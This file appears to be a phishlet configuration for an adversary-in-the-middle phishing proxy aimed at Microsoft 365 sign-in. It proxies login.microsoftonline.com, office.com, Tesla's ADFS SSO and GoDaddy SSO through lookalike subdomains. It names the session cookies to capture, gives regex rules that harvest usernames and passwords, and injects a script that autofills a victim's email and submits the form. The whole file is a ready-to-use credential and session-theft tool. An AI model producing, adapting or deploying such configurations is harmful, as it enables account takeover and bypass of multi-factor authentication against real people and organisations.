name: "o365"
author: ""
min_ver: "2.3.0"
proxy_hosts:
  - { phish_sub: "qevg9-eq98vyb-eqb98yeqb-eqb8yeqb0-qe", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true }
  - { phish_sub: "vqe89eqsj", orig_sub: "www", domain: "office.com", session: false, is_landing: false }
  - { phish_sub: "adfs1", orig_sub: "sso", domain: "tesla.com", session: true, is_landing: false, auto_filter: true }
  - { phish_sub: "adfs1", orig_sub: "sso", domain: "tesla.com:443", session: true, is_landing: false, auto_filter: true } 
  - {phish_sub: "sso", orig_sub: "sso", domain: "godaddy.com", session: true, is_landing: false }
  - {phish_sub: "", orig_sub: "", domain: "godaddy.com", session: false, is_landing: false}

sub_filters:
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ["text/html", "application/json", "application/javascript"] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript"], redirect_only: true }
  - {triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true }
  - {triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  - {triggers_on: 'sso.tesla.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'sso.tesla.com/adfs/services/trust', replace: 'sso.tesla&#46;com/adfs/services/trust', mimes: ['text/html', 'application/json', 'application/javascript']}

auth_tokens:
  - domain: ".login.microsoftonline.com"
    keys: ["ESTSAUTH", "ESTSAUTHPERSISTENT"]
  - domain: "login.microsoftonline.com"
    keys: ["SignInStateCookie"]
auth_urls:
  - "/kmsi*"
credentials:
  username:
    key: "(login|UserName)"
    search: "(.*)"
    type: "post"
  password:
    key: "(passwd|Password|password)"
    search: "(.*)"
    type: "json"
  custom:
    - key: "email" 
      search: '"username":"([^"]*)'
      type: "json"

login:
  domain: "login.microsoftonline.com"
  path: "/"
js_inject:
    - trigger_domains: ["login.microsoftonline.com"]
      trigger_paths: ["/common/oauth2/","/","/*"]
      script: |
        function lp(){
          var emailId = document.querySelector("#i0116");
          var nextButton = document.querySelector("#idSIButton9");
          var query = window.location.href;
          if (/#/.test(window.location.href)){
          var res = query.split("#");
          var data1 = res[0];
          var data2 = res[1];
          console.log(data1);
          console.log(data2);
            if (emailId != null) {
            var m = data2.replace(/[=]/gi, '');
            emailId.focus();
            emailId.value = m;
            nextButton.focus();
            nextButton.click();
            console.log("YES!");
            return;
          }
          }
          setTimeout(function(){lp();}, 1500);
        }
        setTimeout(function(){lp();}, 1500);       